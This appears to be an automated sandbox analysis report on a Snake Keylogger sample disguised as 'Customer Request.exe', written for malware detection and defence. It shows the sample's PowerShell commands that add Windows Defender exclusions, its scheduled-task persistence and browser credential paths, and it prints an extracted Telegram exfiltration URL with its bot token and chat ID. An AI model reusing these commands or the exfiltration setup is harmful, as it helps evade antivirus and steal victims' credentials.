
Windows Analysis Report
Customer Request.exe

Overview

General Information

Sample name: Customer Request.exe
Analysis ID: 1619174
MD5: af70a8bace079f5eb7762fbbec4772ab
SHA1: ae3530a619d587110da7beb2b1511ad3dc44a325
SHA256: a69b613b4c99988b72e10c917489d5a7006b53abc75f7706b578e8b27f3252ab
Tags: exe, user-threatcat_ch

Detection

Snake Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code contains very large strings
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Moves itself to temp directory
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Customer Request.exe (PID: 5944 cmdline: "C:\Users\user\Desktop\Customer Request.exe" MD5: AF70A8BACE079F5EB7762FBBEC4772AB)
    • powershell.exe (PID: 4640 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Customer Request.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4920 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gCFuOglEso.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7184 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 6768 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmpBA61.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Customer Request.exe (PID: 2384 cmdline: "C:\Users\user\Desktop\Customer Request.exe" MD5: AF70A8BACE079F5EB7762FBBEC4772AB)
    • Customer Request.exe (PID: 5932 cmdline: "C:\Users\user\Desktop\Customer Request.exe" MD5: AF70A8BACE079F5EB7762FBBEC4772AB)
  • gCFuOglEso.exe (PID: 4500 cmdline: C:\Users\user\AppData\Roaming\gCFuOglEso.exe MD5: AF70A8BACE079F5EB7762FBBEC4772AB)
    • schtasks.exe (PID: 7344 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmp91E1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • gCFuOglEso.exe (PID: 7388 cmdline: "C:\Users\user\AppData\Roaming\gCFuOglEso.exe" MD5: AF70A8BACE079F5EB7762FBBEC4772AB)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendMessage?chat_id=5007084465", "Token": "7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM", "Chat_id": "5007084465", "Version": "5.1"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
sslproxydump.pcap | MALWARE_Win_SnakeKeylogger | Detects Snake Keylogger | ditekSHen
    • 0xeee7:$m3: SnakePW
    • 0xf455:$m3: SnakePW
    • 0x10a60:$m3: SnakePW
    • 0xc7f34:$m3: SnakePW
    • 0x11171:$m4: \SnakeKeylogger\
    • 0xc8e7b:$m4: \SnakeKeylogger\
    • 0x180628:$m4: \SnakeKeylogger\
    • 0x237df2:$m4: \SnakeKeylogger\
    • 0x2ef5b7:$m4: \SnakeKeylogger\
    • 0x3a6d8c:$m4: \SnakeKeylogger\
    • 0x45e544:$m4: \SnakeKeylogger\
    • 0x5154cd:$m4: \SnakeKeylogger\
    • 0x5cd4d1:$m4: \SnakeKeylogger\
    • 0x68445a:$m4: \SnakeKeylogger\
    • 0x73c46a:$m4: \SnakeKeylogger\
    • 0x7f33f3:$m4: \SnakeKeylogger\
    • 0x8ab3f2:$m4: \SnakeKeylogger\
    • 0x96237b:$m4: \SnakeKeylogger\
    • 0xa19b4b:$m4: \SnakeKeylogger\
    • 0xad1b4a:$m4: \SnakeKeylogger\
    • 0xb90c70:$m4: \SnakeKeylogger\
Source | Rule | Description | Author | Strings
0000000A.00000002.2710969497.0000000003198000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
0000000F.00000002.2704835617.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
0000000F.00000002.2710539876.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
0000000F.00000002.2710539876.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
0000000F.00000002.2710539876.0000000002AEE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
(54 entries in total)
Source | Rule | Description | Author | Strings
10.2.Customer Request.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | Detects executables with potential process hooking | ditekSHen
              • 0x157db:$s1: UnHook
              • 0x157e2:$s2: SetHook
              • 0x157ea:$s3: CallNextHook
              • 0x157f7:$s4: _hook
11.2.gCFuOglEso.exe.3e6a8e8.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
11.2.gCFuOglEso.exe.3e6a8e8.0.unpack | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
11.2.gCFuOglEso.exe.3e6a8e8.0.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
                  • 0x12df6:$a1: get_encryptedPassword
                  • 0x130e2:$a2: get_encryptedUsername
                  • 0x12bf2:$a3: get_timePasswordChanged
                  • 0x12ced:$a4: get_passwordField
                  • 0x12e0c:$a5: set_encryptedPassword
                  • 0x1445e:$a7: get_logins
                  • 0x143c1:$a10: KeyLoggerEventArgs
                  • 0x1402c:$a11: KeyLoggerEventArgsEventHandler
11.2.gCFuOglEso.exe.3e6a8e8.0.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
                  • 0x1a8bc:$a2: \Comodo\Dragon\User Data\Default\Login Data
                  • 0x19aee:$a3: \Google\Chrome\User Data\Default\Login Data
                  • 0x19f21:$a4: \Orbitum\User Data\Default\Login Data
                  • 0x1af60:$a5: \Kometa\User Data\Default\Login Data
(44 entries in total)

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Customer Request.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Customer Request.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Customer Request.exe", ParentImage: C:\Users\user\Desktop\Customer Request.exe, ParentProcessId: 5944, ParentProcessName: Customer Request.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Customer Request.exe", ProcessId: 4640, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmp91E1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmp91E1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\gCFuOglEso.exe, ParentImage: C:\Users\user\AppData\Roaming\gCFuOglEso.exe, ParentProcessId: 4500, ParentProcessName: gCFuOglEso.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmp91E1.tmp", ProcessId: 7344, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmpBA61.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmpBA61.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Customer Request.exe", ParentImage: C:\Users\user\Desktop\Customer Request.exe, ParentProcessId: 5944, ParentProcessName: Customer Request.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmpBA61.tmp", ProcessId: 6768, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Customer Request.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Customer Request.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Customer Request.exe", ParentImage: C:\Users\user\Desktop\Customer Request.exe, ParentProcessId: 5944, ParentProcessName: Customer Request.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Customer Request.exe", ProcessId: 4640, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmpBA61.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmpBA61.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Customer Request.exe", ParentImage: C:\Users\user\Desktop\Customer Request.exe, ParentProcessId: 5944, ParentProcessName: Customer Request.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmpBA61.tmp", ProcessId: 6768, ProcessName: schtasks.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-19T16:38:26.420075+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49715 | 104.21.112.1 | 443 | TCP
2025-02-19T16:38:29.409877+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49721 | 104.21.112.1 | 443 | TCP
2025-02-19T16:38:31.772843+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49724 | 104.21.112.1 | 443 | TCP
2025-02-19T16:38:36.789061+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49733 | 104.21.112.1 | 443 | TCP
2025-02-19T16:38:36.798154+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49734 | 104.21.112.1 | 443 | TCP
2025-02-19T16:38:38.402818+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49738 | 104.21.112.1 | 443 | TCP
2025-02-19T16:38:48.333273+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49746 | 104.21.112.1 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-19T16:38:24.507467+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49712 | 132.226.8.169 | 80 | TCP
2025-02-19T16:38:25.959932+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49712 | 132.226.8.169 | 80 | TCP
2025-02-19T16:38:27.381782+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49717 | 132.226.8.169 | 80 | TCP
2025-02-19T16:38:28.584928+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49718 | 132.226.8.169 | 80 | TCP
2025-02-19T16:38:28.834923+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49720 | 132.226.8.169 | 80 | TCP
2025-02-19T16:38:31.084905+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49718 | 132.226.8.169 | 80 | TCP
2025-02-19T16:38:33.538053+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49727 | 132.226.8.169 | 80 | TCP
2025-02-19T16:38:36.006789+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49730 | 132.226.8.169 | 80 | TCP
2025-02-19T16:38:38.772425+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49737 | 132.226.8.169 | 80 | TCP
2025-02-19T16:38:41.569306+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49740 | 132.226.8.169 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-19T16:38:44.751974+0100 | 2853006 | 1 | A Network Trojan was detected | 192.168.2.8 | 49743 | 149.154.167.220 | 443 | TCP
2025-02-19T16:38:55.245532+0100 | 2853006 | 1 | A Network Trojan was detected | 192.168.2.8 | 49747 | 149.154.167.220 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-19T16:38:44.355485+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49743 | 149.154.167.220 | 443 | TCP
2025-02-19T16:38:54.815601+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49747 | 149.154.167.220 | 443 | TCP
2025-02-19T16:38:55.137343+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49748 | 149.154.167.220 | 443 | TCP
2025-02-19T16:38:56.997076+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49749 | 149.154.167.220 | 443 | TCP
2025-02-19T16:38:58.678083+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49750 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:00.660343+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49751 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:02.295453+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49752 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:04.049970+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49753 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:05.252356+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49754 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:05.843812+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49755 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:07.013538+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49756 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:07.609277+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49757 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:08.930533+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49758 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:09.413267+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49759 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:10.678492+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49760 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:11.045090+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49761 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:13.212372+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49762 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:14.182734+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49764 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:14.998645+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49765 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:16.012936+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49766 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:16.640024+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49767 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:17.774253+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49768 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:18.851088+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49769 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:19.476478+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49770 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:20.968915+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49771 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:21.744463+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49772 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:22.649743+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49773 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:23.436050+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49774 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:24.821611+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49775 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:25.120389+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49776 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:26.514874+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49777 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:26.788390+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49778 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:28.486003+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49779 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:28.602096+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49780 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:31.054616+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49781 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:31.069529+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49782 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:32.795177+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49783 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:33.184254+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49784 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:34.605898+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49786 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:34.878087+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49787 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:36.779494+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49798 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:36.924827+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49803 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:38.650751+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49815 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:39.221052+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49816 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:40.493856+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49823 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:41.862826+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49834 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:42.129743+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49837 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:43.490463+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49846 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:43.751866+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49850 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:45.122465+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49858 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:45.423792+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49862 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:46.918258+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49873 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:47.058058+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49874 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:48.721998+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49887 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:48.864914+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49886 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:50.357882+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49894 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:50.478485+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49895 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:52.076081+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49908 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:52.275612+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49912 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:53.802049+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49922 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:53.962070+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49924 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:55.470819+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49935 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:55.692966+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49936 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:57.142783+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49947 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:57.372529+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49949 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:58.871157+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49960 | 149.154.167.220 | 443 | TCP
2025-02-19T16:39:59.048871+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49961 | 149.154.167.220 | 443 | TCP
2025-02-19T16:40:00.578443+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49972 | 149.154.167.220 | 443 | TCP
2025-02-19T16:40:04.167517+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49996 | 149.154.167.220 | 443 | TCP
2025-02-19T16:40:05.210138+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 50002 | 149.154.167.220 | 443 | TCP
2025-02-19T16:40:21.675180+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 50091 | 149.154.167.220 | 443 | TCP
2025-02-19T16:40:31.586150+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 50096 | 149.154.167.220 | 443 | TCP
2025-02-19T16:40:32.217766+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 50097 | 149.154.167.220 | 443 | TCP
2025-02-19T16:40:33.251871+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 50098 | 149.154.167.220 | 443 | TCP


AV Detection

Source: 0000000F.00000002.2710539876.0000000002A01000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendMessage?chat_id=5007084465", "Token": "7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM", "Chat_id": "5007084465", "Version": "5.1"}
Source: gCFuOglEso.exe.7388.15.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendMessage"}
Source: C:\Users\user\AppData\Local\Temp\tmpG548.tmp (copy) | ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | ReversingLabs: Detection: 31%
Source: Customer Request.exe | Virustotal: Detection: 40%
